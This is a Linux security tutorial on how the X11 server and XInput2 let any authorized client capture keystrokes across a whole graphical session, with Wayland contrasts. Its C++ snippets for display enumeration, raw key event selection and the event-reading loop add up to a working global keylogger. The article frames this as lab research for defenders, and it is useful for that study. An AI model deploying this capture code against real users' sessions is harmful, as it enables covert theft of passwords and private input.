
Keylogging in Linux (Part 2): Advanced Techniques in the Linux GUI and X Server

Why Advanced Keylogging Techniques Depend on the Linux GUI

Advanced keylogging leans on the Linux GUI because once a user signs into a graphical session, the input path stops being simple. The GUI decides which window receives focus, how toolkits interpret the keystrokes, and when events get redirected or buffered, so the attacker’s visibility changes. The hardware layer still shows the raw signal. It just doesn’t reflect how people actually work on a desktop, and that gap is exactly where more capable keyloggers operate.

 Capturing device events is useful, but it only tells you what the keyboard produced, not what the system delivered to an application. That difference is why we’re stepping into the GUI stack. Desktop environments reshape input constantly, and those transformations create opportunities for interception that never appear at the device layer. Teams studying adversary behavior look at these layers because this is where real workflows live, and where visibility can quietly break.

So we focus on how keystrokes move through the X server and the rest of the graphical stack. This stays within authorized research, the kind defenders use to understand how attackers abuse X11’s trusted client model or how Wayland tightens the rules as it becomes the default in Fedora, Ubuntu sessions, and GNOME. Some applications still run under XWayland and behave a bit differently, which adds one more wrinkle for anyone mapping these input paths.

What Is the Linux GUI Stack?

The Linux GUI works as a set of stacked components rather than one built-in interface from the OS. The kernel handles raw input at the bottom, the X server manages windows and display surfaces above it, and toolkits like GTK, Qt, and wxWidgets turn those low-level signals into the controls users interact with. Desktop environments pull those parts together into the workspace people expect. It’s a simple structure on paper, but the layers change how keystrokes move once the system is fully up.

Keyboard events start in the kernel’s input subsystem and reach the X server before anything else touches them. From there, Xlib hands events to applications, toolkits reshape them into widget actions, and the desktop environment overlays shortcuts and policies that can shift routing. That’s why GUI-level keylogging exposes behavior that device-level capture won’t surface. The earlier walk-through of device-event keylogging in the Complete Guide to Keylogging in Linux: Part 1 sets that baseline, so the differences here land cleanly.

   +-------------+                              +-------------+
   |  Display:2  |<---+                   +---->|  wxWidgets  |----+
   +-------------+    |                   |     +-------------+    |
                      |                   |                        |
   +-------------+    |                   |     +-------------+    |
   |  Display:1  |<---+                   +---->|     Qt      |----+
   +-------------+    |                   |     +-------------+    |
                      |                   |                        |
   +-------------+    |                   |     +-------------+    |
   |  Display:0  |<---+                   +---->|    GTK+     |----+
   +-------------+    |                   |     +-------------+    |
                      |                   |                        |
              +-------+------+          +-+-----------+  send data |
         +----|   X Server   |--------->|    Xlib     |<-----------+
         |    |              |<---------|             |  ask to repaint
         |    +-------+------+          +-------------+
  update |            ^
  screen |            | events
         |    +-------+------+
         +--->| Linux Kernel |
              +--------------+

What X Server Terminology Should I Know?

The X server defines the structure on which the Linux GUI runs, and a few terms help make sense of how input moves through it. A display is the full X session, and each screen is a framebuffer inside that session, mapped to a physical monitor. A screen usually lines up with one monitor, though it can span more when the desktop needs the extra space. The root window sits at the base of each screen and anchors every window drawn above it. And the virtual core device is X11’s unified view of keyboard and pointer input, even when the underlying hardware shifts around.
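
These terms also appear in the display name a client passes when it connects, which conventionally has the form [host]:display[.screen], so :0.1 means screen 1 of display 0 on the local machine. The sketch below splits such a name into its parts. DisplayName and ParseDisplayName are hypothetical names used for illustration, not part of Xlib, and the parser deliberately ignores less common variants of the format.

```cpp
#include <cctype>
#include <cstddef>
#include <string>

// Hypothetical helper type: the pieces of an X display name.
struct DisplayName {
    std::string host;  // empty for a local display
    int display = 0;   // the X session (server instance)
    int screen = 0;    // screen within that display; defaults to 0
};

// Reads a non-empty run of digits starting at s[pos] and advances pos.
static bool ParseNumber(const std::string &s, std::size_t &pos, int &value) {
    const std::size_t start = pos;
    value = 0;
    while (pos < s.size() && std::isdigit(static_cast<unsigned char>(s[pos]))) {
        value = value * 10 + (s[pos] - '0');
        ++pos;
    }
    return pos > start;
}

// Parses "[host]:display[.screen]", e.g. ":0", ":1.2", "lab:10".
// Returns false and leaves `out` untouched if the name does not fit.
bool ParseDisplayName(const std::string &name, DisplayName &out) {
    const std::size_t colon = name.rfind(':');
    if (colon == std::string::npos) return false;
    DisplayName parsed;
    parsed.host = name.substr(0, colon);
    std::size_t pos = colon + 1;
    if (!ParseNumber(name, pos, parsed.display)) return false;
    if (pos < name.size()) {
        if (name[pos] != '.') return false;
        ++pos;
        if (!ParseNumber(name, pos, parsed.screen) || pos != name.size()) return false;
    }
    out = parsed;
    return true;
}
```

Calling ParseDisplayName(":1.2", d) fills d with display 1 and screen 2, while a bare socket name such as "X0" is rejected because it has no colon.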

The X Server’s Role in the Linux GUI: Why GUI-Level Input Capture Is Possible

The X server controls the input path in the Linux GUI, so it sees keystrokes before toolkits or applications touch them. It manages focus, coordinates, and routing, which gives it a full view of what the user is doing at any moment. X11’s trusted client model makes this more interesting. Any authorized client can subscribe to the same events an application receives, which is why GUI-level keylogging exists at all. It’s not a loophole — it’s the protocol.

Toolkits like GTK and Qt sit one level higher and only act on the events the server hands them. They turn those events into widget actions, but they don’t influence the server’s routing or timing. That split matters when analysts trace where visibility begins and ends. The architecture behind it is documented in the XInput 2 device and event model, outlined in the XI2 protocol specification, and it shows how predictable this behavior really is.

How Does Keylogging Work in an X Server?

In the Linux GUI, XInput2 sits between the raw hardware signals and the events that applications actually consume. That middle layer is what makes GUI-level keylogging possible, since the server exposes both the unprocessed device data and the keystrokes delivered after focus and mapping rules take over. It’s easier to see how this works once the main pieces are lined up. 

Raw vs. Cooked Events

  • Raw events reflect the physical device state before the server interprets anything.
  • Cooked events show what the focused window receives after mapping, grabs, and layout rules.
  • Watching both streams highlights where toolkits or compositors reshape input, which matters when you’re analyzing behavior.

Master and Slave Devices

  • Slave devices represent the physical keyboards and pointers attached to the system.
  • Master devices are the logical inputs that applications rely on.
  • The server binds slaves to masters so hardware changes don’t break the session.
  • Keyloggers track the master device because it reflects the user’s active input across all physical hardware.

XI2 Version Differences

  • XI2.0 introduced raw events and the master/slave hierarchy.
  • XI2.1 added a scroll device class for smooth scrolling and began delivering raw events to every selecting client regardless of grab state, which changes what a client can observe.
  • XI2.2 added multitouch support.
  • XI2.3 added pointer barrier events.
  • These details come from the XInput2 device model, defined in the libXi interface documentation, and they shape how clients access keyboard events in the first place.

    [Physical Keyboard Input]
                │
         [Kernel Input Layer]
                │
         [XInput2 Slave Device]
                │
         [XInput2 Master Device]
                │
     ┌──────────────┐
     │  Raw Events  │ <─── Captured by keylogger
     └──────────────┘
                │
      [X Server Routing Logic]
                │
     ┌──────────────┐
     │ Cooked Events│ <─── Delivered to focused application
     └──────────────┘
                │
         [Toolkits: GTK/Qt]
                │
        [Application Widgets]
    

    How a Client Captures Events

    • Connect to the X server.
    • Confirm the XInput extension is present.
    • Select key-press and key-release events on the master device.
    • Read events from the server’s queue in a loop.
    • The server handles routing and device management long before the application ever sees those events.

    How Do I List Active X Server Displays on a Linux System?

    In the Linux GUI, the X server creates a socket for each display under /tmp/.X11-unix. Files that start with X match the display numbers, so X0 maps to :0 and so on. It’s an easy way to see which sessions are running without asking the server for anything.

    A few guardrails decide what you can actually touch:

    • Xauthority controls access, so the socket being present doesn’t mean you can use it.
    • Permissions on the directory and the authority file often limit you to the session owner.
    • Multi-seat setups drop multiple sockets, each tied to its own keyboard, mouse, and monitor group.
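
To make the Xauthority point concrete, here is a minimal sketch of the usual lookup order for the authority file: the XAUTHORITY environment variable first, then .Xauthority in the home directory. DefaultXauthorityPath is a hypothetical helper name, and treating an empty variable as unset is a simplification of this sketch rather than documented Xlib behavior.

```cpp
#include <cstdlib>
#include <string>

// Hypothetical helper: returns the authority file a client would normally
// consult, or an empty string if neither variable is usable.
std::string DefaultXauthorityPath() {
    // An explicit XAUTHORITY setting takes priority.
    const char *xauth = std::getenv("XAUTHORITY");
    if (xauth != nullptr && xauth[0] != '\0') return xauth;
    // Otherwise fall back to the per-user default in the home directory.
    const char *home = std::getenv("HOME");
    if (home != nullptr && home[0] != '\0') return std::string(home) + "/.Xauthority";
    return "";
}
```

If the returned file is not readable by the current user, opening the display will typically fail even though the socket is visible in /tmp/.X11-unix.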

    With that in mind, enumeration is just a directory walk. You filter for entries that look like displays, try to open them, and let the server tell you how many screens it owns and their dimensions. Nothing fancy — just checking what’s alive and what you’re allowed to see.

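    #include <X11/Xlib.h>
    #include <cstdio>
    #include <filesystem>
    #include <string>
    #include <system_error>
    #include <vector>

    // Returns the names (":0", ":1", ...) of every display we could open.
    std::vector<std::string> EnumerateDisplay() {
        std::vector<std::string> displays;
        std::error_code ec;  // avoids an exception if the directory is missing
        for (const auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix", ec)) {
            std::string name = p.path().filename().string();
            // Socket names look like "X0", "X1", ...; skip anything else.
            if (name.size() < 2 || name[0] != 'X') continue;
            std::string display_name = ":" + name.substr(1);
            // XOpenDisplay returns NULL when we are not authorized to connect.
            Display *disp = XOpenDisplay(display_name.c_str());
            if (disp == NULL) continue;
            int count = XScreenCount(disp);
            printf("Display %s has %d screens\n", display_name.c_str(), count);
            for (int i = 0; i < count; i++) {
                Screen *s = ScreenOfDisplay(disp, i);
                printf("%d: %dx%d\n", i, s->width, s->height);
            }
            displays.push_back(display_name);
            XCloseDisplay(disp);  // release the connection before moving on
        }
        return displays;
    }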
    

    Most workstations report a single display with one screen, usually a clean 1920×1080 layout. That view can narrow on systems that already follow best practices for hardening an Arch Linux system, where tighter permissions limit what the server is willing to reveal.

    Detecting XInputExtension Support in the Linux GUI Environment

    In the Linux GUI, the first step is checking whether the server exposes XInput2. Most displays support it cleanly, but version drift shows up under XWayland, where the compatibility layer reports newer versions even when the underlying behavior still follows older XI2 rules. Better to test for the version you expect rather than assume the server will match your code.

    #include <X11/Xlib.h>
    #include <X11/extensions/XInput2.h>
    #include <cstdlib>
    #include <iostream>

    // Set up X. hostname is the display name (for example ":0");
    // passing NULL makes Xlib fall back to $DISPLAY.
    Display * disp = XOpenDisplay(hostname);
    if (NULL == disp) {
        // XDisplayName reports the name Xlib tried, even when hostname is NULL
        std::cerr << "Cannot open X display: " << XDisplayName(hostname) << std::endl;
        exit(1);
    }
    // Test for XInput 2 extension
    int xiOpcode, queryEvent, queryError;
    if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) {
        std::cerr << "X Input extension not available" << std::endl;
        exit(2);
    }
    // Request XInput 2.0, guarding against changes in future versions
    int major = 2, minor = 0;
    int queryResult = XIQueryVersion(disp, &major, &minor);
    if (queryResult == BadRequest) {
        std::cerr << "Need XI 2.0 support (got " << major << "." << minor << ")" << std::endl;
        exit(3);
    } else if (queryResult != Success) {
        std::cerr << "Internal error" << std::endl;
        exit(4);
    }
    

    Registering XInput Event Masks in the Linux GUI

    After the extension check, you tell the server which events you care about. XInput masks are straightforward: a device ID, a length, and a bitfield. In the Linux GUI, most teams target the master device so they don’t have to track each physical keyboard.
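
The bitfield itself is plain bit arithmetic: one bit per event code, eight codes per byte. The sketch below reproduces that arithmetic without the X headers so it can be compiled anywhere. The two event codes are copied from XInput2.h as best I know them and should be checked against your installed headers; MaskLen, SetMask, MaskIsSet, and RawKeyMask are hypothetical stand-ins for the XIMaskLen, XISetMask, and XIMaskIsSet macros, not library functions.

```cpp
#include <cstddef>
#include <vector>

// Event codes mirrored from <X11/extensions/XInput2.h> (assumed values)
// so this sketch compiles without the X headers.
constexpr int kRawKeyPress = 13;    // XI_RawKeyPress
constexpr int kRawKeyRelease = 14;  // XI_RawKeyRelease

// Bytes needed to hold a bit for every event code up to last_event.
constexpr std::size_t MaskLen(int last_event) {
    return static_cast<std::size_t>((last_event >> 3) + 1);
}

// Sets the bit for one event code: byte index is code / 8, bit is code % 8.
void SetMask(std::vector<unsigned char> &mask, int event) {
    mask[event >> 3] |= static_cast<unsigned char>(1 << (event & 7));
}

// Tests whether the bit for one event code is set.
bool MaskIsSet(const std::vector<unsigned char> &mask, int event) {
    return (mask[event >> 3] & (1 << (event & 7))) != 0;
}

// Builds the smallest bitfield that selects raw key press and release.
std::vector<unsigned char> RawKeyMask() {
    std::vector<unsigned char> mask(MaskLen(kRawKeyRelease), 0);
    SetMask(mask, kRawKeyPress);
    SetMask(mask, kRawKeyRelease);
    return mask;
}
```

With these values the mask is two bytes long and both bits land in the second byte. Real clients usually size the buffer with XIMaskLen(XI_LASTEVENT) instead, which leaves room for every event the headers define.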

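    // Declared in <X11/extensions/XInput2.h>; shown here for reference only.
    // typedef struct {
    //     int deviceid;
    //     int mask_len;
    //     unsigned char* mask;
    // } XIEventMask;

    Window root = DefaultRootWindow(disp);
    XIEventMask m;
    m.deviceid = XIAllMasterDevices;          // every master device, not one keyboard
    m.mask_len = XIMaskLen(XI_LASTEVENT);     // bytes needed for all known event codes
    m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));  // zeroed bitfield
    XISetMask(m.mask, XI_RawKeyPress);
    XISetMask(m.mask, XI_RawKeyRelease);
    XISelectEvents(disp, root, &m, 1);
    XSync(disp, False);  // make sure the request reaches the server before freeing
    free(m.mask);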
    

    One thing worth noting: X11 allows this kind of global capture. Wayland does not. Wayland keeps input scoped to the active client, and those rules come from the core details of the Wayland protocol rather than anything in XInput2. XWayland sits between them and still honors X11-style masks for legacy clients, which explains why this path continues to work on modern desktops.
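
Because the behavior depends on which stack owns the session, it can help to check the session type before drawing conclusions from a test. The sketch below is a rough heuristic based on three common environment variables (XDG_SESSION_TYPE, WAYLAND_DISPLAY, and DISPLAY). SessionKind, ClassifySession, and CurrentSession are hypothetical names, and the variables can be missing or overridden, so treat the result as a hint rather than proof.

```cpp
#include <cstdlib>
#include <string>

// Hypothetical classification of the graphical session.
enum class SessionKind { X11, Wayland, WaylandWithXWayland, Unknown };

static bool IsSet(const char *v) { return v != nullptr && v[0] != '\0'; }

// Pure function so the heuristic can be exercised without touching the
// real environment. Arguments may be null when a variable is unset.
SessionKind ClassifySession(const char *session_type,
                            const char *wayland_display,
                            const char *x_display) {
    const std::string type = IsSet(session_type) ? session_type : "";
    const bool wayland = (type == "wayland") || IsSet(wayland_display);
    const bool x11 = IsSet(x_display);
    // A Wayland session that also exports DISPLAY is usually running XWayland.
    if (wayland) return x11 ? SessionKind::WaylandWithXWayland : SessionKind::Wayland;
    if (type == "x11" || x11) return SessionKind::X11;
    return SessionKind::Unknown;
}

// Convenience wrapper that reads the current process environment.
SessionKind CurrentSession() {
    return ClassifySession(std::getenv("XDG_SESSION_TYPE"),
                           std::getenv("WAYLAND_DISPLAY"),
                           std::getenv("DISPLAY"));
}
```

A result of WaylandWithXWayland is the hybrid case described above: native Wayland clients are isolated, while X11 clients connected through XWayland still follow X11-style rules among themselves.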

    Reading Keyboard Events in the Linux GUI Using XGenericEventCookie

    With the mask in place, reading events is just a loop. X11 gives you a GenericEvent, you unwrap the cookie, and you check the event type. The server handles layout rules, Unicode mapping, and most multi-layout quirks through XKB. Some edge cases still slip through — partial mappings, rare layouts, hardware with unusual scan codes — which is why teams building detection pipelines tend to validate their assumptions against recent work on keyboard event behavior instead of trusting defaults.

    // Declared in <X11/Xlib.h>; shown here for reference only.
    // typedef struct {
    //     int type;
    //     unsigned long serial;
    //     Bool send_event;
    //     Display *display;
    //     int extension;
    //     int evtype;
    //     unsigned int cookie;
    //     void *data;
    // } XGenericEventCookie;

    // XkbKeycodeToKeysym needs <X11/XKBlib.h>.
    while (true) {
        XEvent event;
        XNextEvent(disp, &event);
        XGenericEventCookie *cookie = &event.xcookie;
        // Skip anything that is not an XInput2 generic event.
        if (cookie->type != GenericEvent || cookie->extension != xiOpcode) continue;
        if (!XGetEventData(disp, cookie)) continue;
        switch (cookie->evtype) {
            case XI_RawKeyRelease:
            case XI_RawKeyPress: {
                XIRawEvent *ev = (XIRawEvent*)cookie->data;
                // Ask X what it calls that key (group 0, shift level 0)
                KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
                char *str = (NoSymbol == s) ? NULL : XKeysymToString(s);
                if (NULL != str)
                    std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-")
                              << str << " " << std::flush;
                break;
            }
        }
        // Release the event data on every path so it is not leaked.
        XFreeEventData(disp, cookie);
    }
    

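    The nice part about this path is that X11 handles the ugly pieces, such as keyboard maps and scan code translation, so you don’t have to rebuild any of it yourself. It keeps the loop simple, even when the underlying setup isn’t. One caveat: the lookup above passes group 0 and level 0, so it reports the unshifted symbol from the first layout. Tracking modifiers or the active layout group takes extra work.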
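
Since raw events arrive as separate press and release transitions, anything analyzing this output has to keep its own state to know which keys are held at a given moment. The sketch below replays a captured log and reports the keys still down at the end. It assumes the +Name / -Name token format printed by the loop above, and HeldKeys is a hypothetical helper, not part of any X library.

```cpp
#include <set>
#include <sstream>
#include <string>

// Replays "+Name" / "-Name" tokens and returns the keys still held
// when the log ends. Tokens that do not fit the format are ignored.
std::set<std::string> HeldKeys(const std::string &log) {
    std::set<std::string> held;
    std::istringstream in(log);
    std::string token;
    while (in >> token) {
        if (token.size() < 2) continue;
        const std::string name = token.substr(1);
        if (token[0] == '+') {
            held.insert(name);   // press: key goes down
        } else if (token[0] == '-') {
            held.erase(name);    // release: key comes back up
        }
    }
    return held;
}
```

For the log "+Shift_L +a -a +b", the function reports Shift_L and b as held, which is the kind of state a reviewer needs in order to tell a lowercase keystroke from a shifted one.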

    Security Limitations of X11 in the Linux GUI

    X11 in the Linux GUI still follows a trust model where clients share more information than they should. The design predates any notion of isolating one application’s input from another, and that gap shows up fast when you look at how the server handles raw events.

    • Global input visibility: any client that registers for raw events can see keystrokes across the whole session, not just its own window.
    • No real isolation: focus only affects cooked events; the raw stream is still mirrored to every client listening.
    • XWayland inherits this: legacy behavior survives in the compatibility layer, even though native Wayland apps stay confined to their own surfaces. The difference aligns with how desktops interpret the Wayland model's baseline expectations.
    • Cross-application leakage: timing, key transitions, and visibility across windows are all well documented in studies of input behavior and show how much X11 exposes during normal use.

    For testing, the full keylogger implementation helps you trace how raw events move through the server and where boundaries actually sit. It’s a controlled-lab tool, not something you run against another user’s session, and it shows why X11’s older model still matters when you’re evaluating input visibility on a modern desktop.

    FAQ: Common Questions About Input Capture in the Linux GUI

    Does the Linux GUI allow global keylogging?

    Under X11, yes. Any client with access to the display can subscribe to raw events and see keystrokes across the session, regardless of focus.

    Why does X11 permit global capture?

    The protocol was built around cooperative clients. It never introduced strict per-window boundaries, so the server still mirrors raw keyboard events to any client that registers for them.

    Does keylogging work under Wayland?

    Not in the same way. Wayland isolates input per client and doesn’t forward global events, so you only see the keystrokes meant for your own surfaces.

    What are raw vs cooked events?

    Raw events show the physical key transitions before mapping or focus rules. Cooked events are the interpreted keystrokes delivered to the active window after the server applies layout and state.

    Why does behavior differ under XWayland?

    XWayland runs legacy applications inside a compatibility layer, so those clients still follow X11’s visibility rules. Native Wayland apps follow stricter isolation, but X11 clients inside XWayland keep the older behavior.

    Final Thoughts on Keylogging in Linux

    X11 exposes more of a session than most teams expect, so defenders watch for clients that have no business listening to raw input. A process tapping event streams without a clear role shows up fast once you know the normal traffic. It feels off.

    During controlled tests, we lean on small keyboard-monitoring tools to see exactly what the server hands out and which parts of the stack leak more than they should, because X11 still reflects an older trust model that never really hid much.

    Wayland tightens those paths and drops most of the legacy exposure, though XWayland keeps enough of the old flow alive that you can’t treat it as sealed. The mix creates gaps in understanding if you’re not careful. Environments blend both stacks. And knowing which subsystem owns an event becomes key when you’re building detections that won’t trip on every hybrid desktop in the fleet.

    The next step is tying these observations into real detection signals — what to monitor, what to flag, and how to separate noise from actual risk. That’s where we pick up in Part 3 of this series.
